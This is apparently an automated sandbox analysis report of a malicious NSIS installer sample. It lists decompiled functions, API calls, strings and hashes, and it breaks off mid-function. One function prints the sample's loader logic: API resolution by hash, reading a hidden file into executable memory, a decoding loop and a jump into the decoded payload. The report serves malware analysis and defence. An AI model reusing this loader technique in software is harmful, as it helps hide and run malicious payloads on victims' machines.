                                                                                      • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                                      • Part of subcall function 0040390A: GetUserDefaultUILanguage.KERNELBASE(00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" ,00000000), ref: 00403924
                                                                                      • Part of subcall function 0040390A: lstrlenA.KERNEL32(uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,73BCFA90), ref: 004039FA
                                                                                      • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe,uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                                                                                      • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(uvlcopdlxoed), ref: 00403A18
                                                                                      • Part of subcall function 0040390A: LoadImageA.USER32 ref: 00403A61
                                                                                      • Part of subcall function 0040390A: RegisterClassA.USER32 ref: 00403A9E
                                                                                      • Part of subcall function 00403830: CloseHandle.KERNEL32(000002A8,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                                                    • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                                                    • ExitProcess.KERNEL32 ref: 00403688
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                                                    • ExitProcess.KERNEL32 ref: 0040382A
                                                                                      • Part of subcall function 00405813: MessageBoxIndirectA.USER32 ref: 0040586E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                                                                                    • String ID: "$"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$arability Setup$~nsu
                                                                                    • API String ID: 1314998376-1673841308
                                                                                    • Opcode ID: 92f4727230b5494df4ae19d242d75775fcc962e9ce705fe20936cac325b27094
                                                                                    • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                                                    • Opcode Fuzzy Hash: 92f4727230b5494df4ae19d242d75775fcc962e9ce705fe20936cac325b27094
                                                                                    • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 98%
                                                                                    			E004058BF(void* __eflags, signed int _a4, signed int _a8) {
                                                                                    				signed int _v8;
                                                                                    				void* _v12;
                                                                                    				signed int _v16;
                                                                                    				struct _WIN32_FIND_DATAA _v336;
                                                                                    				signed int _t40;
                                                                                    				char* _t53;
                                                                                    				signed int _t55;
                                                                                    				signed int _t58;
                                                                                    				signed int _t64;
                                                                                    				signed int _t66;
                                                                                    				void* _t68;
                                                                                    				signed char _t69;
                                                                                    				CHAR* _t71;
                                                                                    				void* _t72;
                                                                                    				CHAR* _t73;
                                                                                    				char* _t76;
                                                                                    
                                                                                    				_t69 = _a8;
                                                                                    				_t73 = _a4;
                                                                                    				_v8 = _t69 & 0x00000004;
                                                                                    				_t40 = E00405B7D(__eflags, _t73);
                                                                                    				_v16 = _t40;
                                                                                    				if((_t69 & 0x00000008) != 0) {
                                                                                    					_t66 = DeleteFileA(_t73); // executed
                                                                                    					asm("sbb eax, eax");
                                                                                    					_t68 =  ~_t66 + 1;
                                                                                    					 *0x42f4c8 =  *0x42f4c8 + _t68;
                                                                                    					return _t68;
                                                                                    				}
                                                                                    				_a4 = _t69;
                                                                                    				_t8 =  &_a4;
                                                                                    				 *_t8 = _a4 & 0x00000001;
                                                                                    				__eflags =  *_t8;
                                                                                    				if( *_t8 == 0) {
                                                                                    					L5:
                                                                                    					E004060F7(0x42b898, _t73);
                                                                                    					__eflags = _a4;
                                                                                    					if(_a4 == 0) {
                                                                                    						E00405AD6(_t73);
                                                                                    					} else {
                                                                                    						lstrcatA(0x42b898, "\*.*");
                                                                                    					}
                                                                                    					__eflags =  *_t73;
                                                                                    					if( *_t73 != 0) {
                                                                                    						L10:
                                                                                    						lstrcatA(_t73, 0x40a014);
                                                                                    						L11:
                                                                                    						_t71 =  &(_t73[lstrlenA(_t73)]);
                                                                                    						_t40 = FindFirstFileA(0x42b898,  &_v336);
                                                                                    						__eflags = _t40 - 0xffffffff;
                                                                                    						_v12 = _t40;
                                                                                    						if(_t40 == 0xffffffff) {
                                                                                    							L29:
                                                                                    							__eflags = _a4;
                                                                                    							if(_a4 != 0) {
                                                                                    								_t32 = _t71 - 1;
                                                                                    								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                                                    								__eflags =  *_t32;
                                                                                    							}
                                                                                    							goto L31;
                                                                                    						} else {
                                                                                    							goto L12;
                                                                                    						}
                                                                                    						do {
                                                                                    							L12:
                                                                                    							_t76 =  &(_v336.cFileName);
                                                                                    							_t53 = E00405ABA( &(_v336.cFileName), 0x3f);
                                                                                    							__eflags =  *_t53;
                                                                                    							if( *_t53 != 0) {
                                                                                    								__eflags = _v336.cAlternateFileName;
                                                                                    								if(_v336.cAlternateFileName != 0) {
                                                                                    									_t76 =  &(_v336.cAlternateFileName);
                                                                                    								}
                                                                                    							}
                                                                                    							__eflags =  *_t76 - 0x2e;
                                                                                    							if( *_t76 != 0x2e) {
                                                                                    								L19:
                                                                                    								E004060F7(_t71, _t76);
                                                                                    								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                                                    								if(__eflags == 0) {
                                                                                    									_t55 = E00405877(__eflags, _t73, _v8);
                                                                                    									__eflags = _t55;
                                                                                    									if(_t55 != 0) {
                                                                                    										E0040521E(0xfffffff2, _t73);
                                                                                    									} else {
                                                                                    										__eflags = _v8 - _t55;
                                                                                    										if(_v8 == _t55) {
                                                                                    											 *0x42f4c8 =  *0x42f4c8 + 1;
                                                                                    										} else {
                                                                                    											E0040521E(0xfffffff1, _t73);
                                                                                    											E00405ED6(_t72, _t73, 0);
                                                                                    										}
                                                                                    									}
                                                                                    								} else {
                                                                                    									__eflags = (_a8 & 0x00000003) - 3;
                                                                                    									if(__eflags == 0) {
                                                                                    										E004058BF(__eflags, _t73, _a8);
                                                                                    									}
                                                                                    								}
                                                                                    								goto L27;
                                                                                    							}
                                                                                    							_t64 =  *((intOrPtr*)(_t76 + 1));
                                                                                    							__eflags = _t64;
                                                                                    							if(_t64 == 0) {
                                                                                    								goto L27;
                                                                                    							}
                                                                                    							__eflags = _t64 - 0x2e;
                                                                                    							if(_t64 != 0x2e) {
                                                                                    								goto L19;
                                                                                    							}
                                                                                    							__eflags =  *((char*)(_t76 + 2));
                                                                                    							if( *((char*)(_t76 + 2)) == 0) {
                                                                                    								goto L27;
                                                                                    							}
                                                                                    							goto L19;
                                                                                    							L27:
                                                                                    							_t58 = FindNextFileA(_v12,  &_v336);
                                                                                    							__eflags = _t58;
                                                                                    						} while (_t58 != 0);
                                                                                    						_t40 = FindClose(_v12);
                                                                                    						goto L29;
                                                                                    					}
                                                                                    					__eflags =  *0x42b898 - 0x5c;
                                                                                    					if( *0x42b898 != 0x5c) {
                                                                                    						goto L11;
                                                                                    					}
                                                                                    					goto L10;
                                                                                    				} else {
                                                                                    					__eflags = _t40;
                                                                                    					if(_t40 == 0) {
                                                                                    						L31:
                                                                                    						__eflags = _a4;
                                                                                    						if(_a4 == 0) {
                                                                                    							L39:
                                                                                    							return _t40;
                                                                                    						}
                                                                                    						__eflags = _v16;
                                                                                    						if(_v16 != 0) {
                                                                                    							_t40 = E0040646B(_t73);
                                                                                    							__eflags = _t40;
                                                                                    							if(_t40 == 0) {
                                                                                    								goto L39;
                                                                                    							}
                                                                                    							E00405A8F(_t73);
                                                                                    							_t40 = E00405877(__eflags, _t73, _v8 | 0x00000001);
                                                                                    							__eflags = _t40;
                                                                                    							if(_t40 != 0) {
                                                                                    								return E0040521E(0xffffffe5, _t73);
                                                                                    							}
                                                                                    							__eflags = _v8;
                                                                                    							if(_v8 == 0) {
                                                                                    								goto L33;
                                                                                    							}
                                                                                    							E0040521E(0xfffffff1, _t73);
                                                                                    							return E00405ED6(_t72, _t73, 0);
                                                                                    						}
                                                                                    						L33:
                                                                                    						 *0x42f4c8 =  *0x42f4c8 + 1;
                                                                                    						return _t40;
                                                                                    					}
                                                                                    					__eflags = _t69 & 0x00000002;
                                                                                    					if((_t69 & 0x00000002) == 0) {
                                                                                    						goto L31;
                                                                                    					}
                                                                                    					goto L5;
                                                                                    				}
                                                                                    			}



















                                                                                    0x00405a42
                                                                                    0x00000000
                                                                                    0x00405a42
                                                                                    0x0040590f
                                                                                    0x00405912
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405912

                                                                                    APIs
                                                                                    • DeleteFileA.KERNELBASE(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                                                    • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                                                    • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                                                    • FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                                                    • FindClose.KERNEL32(00000000), ref: 00405A26
                                                                                    Strings
                                                                                    • "C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" , xrefs: 004058BF
                                                                                    • \*.*, xrefs: 0040592A
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                    • String ID: "C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                    • API String ID: 2035342205-497949629
                                                                                    • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                                    • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                                                    • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                                    • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 65%
                                                                                    			E6FD710A0(void* __eflags) {
                                                                                    				long _v8;
                                                                                    				intOrPtr _v12;
                                                                                    				intOrPtr _v16;
                                                                                    				short _v536;
                                                                                    				intOrPtr* _t24;
                                                                                    				void* _t33;
                                                                                    				void* _t34;
                                                                                    				void* _t37;
                                                                                    				void* _t46;
                                                                                    				void* _t52;
                                                                                    
                                                                                    				_v8 = 0;
                                                                                    				_t51 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                                                                                    				_v12 = E6FD71000( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8a111d91);
                                                                                    				_t24 = E6FD71000( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0xa4f84a9a);
                                                                                    				_v16 = E6FD71000(_t51, 0x433a3842);
                                                                                    				E6FD71000(_t51, 0xa5f15738);
                                                                                    				 *((intOrPtr*)(E6FD71000(_t51, 0xcbec1a0)))();
                                                                                    				 *_t24( &_v536, L"\\fmkr8rw7aiu", 0x103,  &_v536);
                                                                                    				_t33 = CreateFileW( &_v536, 0x80000000, 7, 0, 3, 0x80, 0);
                                                                                    				_t34 = VirtualAlloc(0, 0x1a05, 0x3000, 0x40); // executed
                                                                                    				_t52 = _t34;
                                                                                    				ReadFile(_t33, _t52, 0x1a05,  &_v8, 0);
                                                                                    				_t46 = 0;
                                                                                    				if(_v8 > 0) {
                                                                                    					do {
                                                                                    						asm("ror dl, 1");
                                                                                    						asm("rol dl, 1");
                                                                                    						 *(_t52 + _t46) =  !( !(_t46 - (0x000000b4 -  *(_t52 + _t46) + _t46 ^ 0x00000078) + 0x00000001 ^ 0x000000e9) - _t46);
                                                                                    						_t46 = _t46 + 1;
                                                                                    					} while (_t46 < _v8);
                                                                                    				}
                                                                                    				_t37 =  *_t52(); // executed
                                                                                    				return _t37;
                                                                                    			}














                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FD71144
                                                                                    • VirtualAlloc.KERNELBASE(00000000,00001A05,00003000,00000040), ref: 6FD71157
                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00001A05,00000000,00000000), ref: 6FD71168
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.659130395.000000006FD71000.00000020.00020000.sdmp, Offset: 6FD70000, based on PE: true
                                                                                    • Associated: 00000000.00000002.659123000.000000006FD70000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.659152314.000000006FD72000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: File$AllocCreateReadVirtual
                                                                                    • String ID: \fmkr8rw7aiu
                                                                                    • API String ID: 3585551309-3367158975
                                                                                    • Opcode ID: 3c45c23c9c9571d778a8c2428821ce29e25e1b54fba57198f3e03524e431a930
                                                                                    • Instruction ID: fe2735157941c9f5fc62cf0389a5855a6818715355d2810d23aff66e1eb7dfa6
                                                                                    • Opcode Fuzzy Hash: 3c45c23c9c9571d778a8c2428821ce29e25e1b54fba57198f3e03524e431a930
                                                                                    • Instruction Fuzzy Hash: 66212C35A40308BFE720D7B48C95FDEB7B8EF55B55F500199F604EB280DA747A049B61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0040646B(CHAR* _a4) {
                                                                                    				void* _t2;
                                                                                    
                                                                                    				_t2 = FindFirstFileA(_a4, 0x42c0e0); // executed
                                                                                    				if(_t2 == 0xffffffff) {
                                                                                    					return 0;
                                                                                    				}
                                                                                    				FindClose(_t2);
                                                                                    				return 0x42c0e0;
                                                                                    			}





                                                                                    APIs
                                                                                    • FindFirstFileA.KERNELBASE(73BCFA90,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,73BCFA90,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                                                    • FindClose.KERNEL32(00000000), ref: 00406482
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                                    • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                                                    • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                                    • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 96%
                                                                                    			E0040390A(void* __eflags) {
                                                                                    				intOrPtr _v4;
                                                                                    				intOrPtr _v8;
                                                                                    				int _v12;
                                                                                    				void _v16;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				intOrPtr* _t17;
                                                                                    				void* _t25;
                                                                                    				void* _t27;
                                                                                    				int _t28;
                                                                                    				void* _t31;
                                                                                    				int _t34;
                                                                                    				int _t35;
                                                                                    				intOrPtr _t36;
                                                                                    				int _t39;
                                                                                    				char _t57;
                                                                                    				CHAR* _t59;
                                                                                    				signed char _t63;
                                                                                    				signed short _t67;
                                                                                    				CHAR* _t74;
                                                                                    				intOrPtr _t76;
                                                                                    				CHAR* _t81;
                                                                                    
                                                                                    				_t76 =  *0x42f434;
                                                                                    				_t17 = E00406500(2);
                                                                                    				_t84 = _t17;
                                                                                    				if(_t17 == 0) {
                                                                                    					_t74 = 0x42a890;
                                                                                    					"1033" = 0x30;
                                                                                    					 *0x436001 = 0x78;
                                                                                    					 *0x436002 = 0;
                                                                                    					E00405FDE(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a890, 0);
                                                                                    					__eflags =  *0x42a890;
                                                                                    					if(__eflags == 0) {
                                                                                    						E00405FDE(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a890, 0);
                                                                                    					}
                                                                                    					lstrcatA("1033", _t74);
                                                                                    				} else {
                                                                                    					_t67 =  *_t17(); // executed
                                                                                    					E00406055("1033", _t67 & 0x0000ffff);
                                                                                    				}
                                                                                    				E00403BCF(_t71, _t84);
                                                                                    				_t80 = "C:\\Users\\jones\\AppData\\Local\\Temp";
                                                                                    				 *0x42f4c0 =  *0x42f43c & 0x00000020;
                                                                                    				 *0x42f4dc = 0x10000;
                                                                                    				if(E00405B7D(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
                                                                                    					L16:
                                                                                    					if(E00405B7D(_t92, _t80) == 0) {
                                                                                    						E0040618A(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
                                                                                    					}
                                                                                    					_t25 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                    					 *0x42ec08 = _t25;
                                                                                    					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                                                    						L21:
                                                                                    						if(E0040140B(0) == 0) {
                                                                                    							_t27 = E00403BCF(_t71, __eflags);
                                                                                    							__eflags =  *0x42f4e0;
                                                                                    							if( *0x42f4e0 != 0) {
                                                                                    								_t28 = E004052F0(_t27, 0);
                                                                                    								__eflags = _t28;
                                                                                    								if(_t28 == 0) {
                                                                                    									E0040140B(1);
                                                                                    									goto L33;
                                                                                    								}
                                                                                    								__eflags =  *0x42ebec; // 0x0
                                                                                    								if(__eflags == 0) {
                                                                                    									E0040140B(2);
                                                                                    								}
                                                                                    								goto L22;
                                                                                    							}
                                                                                    							ShowWindow( *0x42a870, 5);
                                                                                    							_t34 = E00406492("RichEd20");
                                                                                    							__eflags = _t34;
                                                                                    							if(_t34 == 0) {
                                                                                    								E00406492("RichEd32");
                                                                                    							}
                                                                                    							_t81 = "RichEdit20A";
                                                                                    							_t35 = GetClassInfoA(0, _t81, 0x42ebc0);
                                                                                    							__eflags = _t35;
                                                                                    							if(_t35 == 0) {
                                                                                    								GetClassInfoA(0, "RichEdit", 0x42ebc0);
                                                                                    								 *0x42ebe4 = _t81;
                                                                                    								RegisterClassA(0x42ebc0);
                                                                                    							}
                                                                                    							_t36 =  *0x42ec00; // 0x0
                                                                                    							_t39 = DialogBoxParamA( *0x42f420, _t36 + 0x00000069 & 0x0000ffff, 0, E00403CA7, 0);
                                                                                    							E0040385A(E0040140B(5), 1);
                                                                                    							return _t39;
                                                                                    						}
                                                                                    						L22:
                                                                                    						_t31 = 2;
                                                                                    						return _t31;
                                                                                    					} else {
                                                                                    						_t71 =  *0x42f420;
                                                                                    						 *0x42ebc4 = E00401000;
                                                                                    						 *0x42ebd0 =  *0x42f420;
                                                                                    						 *0x42ebd4 = _t25;
                                                                                    						 *0x42ebe4 = 0x40a1f4;
                                                                                    						if(RegisterClassA(0x42ebc0) == 0) {
                                                                                    							L33:
                                                                                    							__eflags = 0;
                                                                                    							return 0;
                                                                                    						}
                                                                                    						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                                                    						 *0x42a870 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
                                                                                    						goto L21;
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t71 =  *(_t76 + 0x48);
                                                                                    					_t86 = _t71;
                                                                                    					if(_t71 == 0) {
                                                                                    						goto L16;
                                                                                    					}
                                                                                    					_t74 = 0x42e3c0;
                                                                                    					E00405FDE(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f478, 0x42e3c0, 0);
                                                                                    					_t57 =  *0x42e3c0; // 0x75
                                                                                    					if(_t57 == 0) {
                                                                                    						goto L16;
                                                                                    					}
                                                                                    					if(_t57 == 0x22) {
                                                                                    						_t74 = 0x42e3c1;
                                                                                    						 *((char*)(E00405ABA(0x42e3c1, 0x22))) = 0;
                                                                                    					}
                                                                                    					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                                                    					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                                                    						L15:
                                                                                    						E004060F7(_t80, E00405A8F(_t74));
                                                                                    						goto L16;
                                                                                    					} else {
                                                                                    						_t63 = GetFileAttributesA(_t74);
                                                                                    						if(_t63 == 0xffffffff) {
                                                                                    							L14:
                                                                                    							E00405AD6(_t74);
                                                                                    							goto L15;
                                                                                    						}
                                                                                    						_t92 = _t63 & 0x00000010;
                                                                                    						if((_t63 & 0x00000010) != 0) {
                                                                                    							goto L15;
                                                                                    						}
                                                                                    						goto L14;
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                      • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                                      • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                                    • GetUserDefaultUILanguage.KERNELBASE(00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" ,00000000), ref: 00403924
                                                                                      • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                                    • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" ,00000000), ref: 00403985
                                                                                    • lstrlenA.KERNEL32(uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,73BCFA90), ref: 004039FA
                                                                                    • lstrcmpiA.KERNEL32(?,.exe,uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                                                                                    • GetFileAttributesA.KERNEL32(uvlcopdlxoed), ref: 00403A18
                                                                                    • LoadImageA.USER32 ref: 00403A61
                                                                                    • RegisterClassA.USER32 ref: 00403A9E
                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                                                    • CreateWindowExA.USER32 ref: 00403AEB
                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                                                    • GetClassInfoA.USER32 ref: 00403B4D
                                                                                    • GetClassInfoA.USER32 ref: 00403B5A
                                                                                    • RegisterClassA.USER32 ref: 00403B63
                                                                                    • DialogBoxParamA.USER32 ref: 00403B82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: "C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$uvlcopdlxoed
                                                                                    • API String ID: 606308-2680337277
                                                                                    • Opcode ID: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
                                                                                    • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                                                    • Opcode Fuzzy Hash: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
                                                                                    • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 78%
                                                                                    			E00402EA1(void* __eflags, signed int _a4) {
                                                                                    				DWORD* _v8;
                                                                                    				DWORD* _v12;
                                                                                    				void* _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				long _v24;
                                                                                    				intOrPtr _v28;
                                                                                    				intOrPtr _v32;
                                                                                    				intOrPtr _v36;
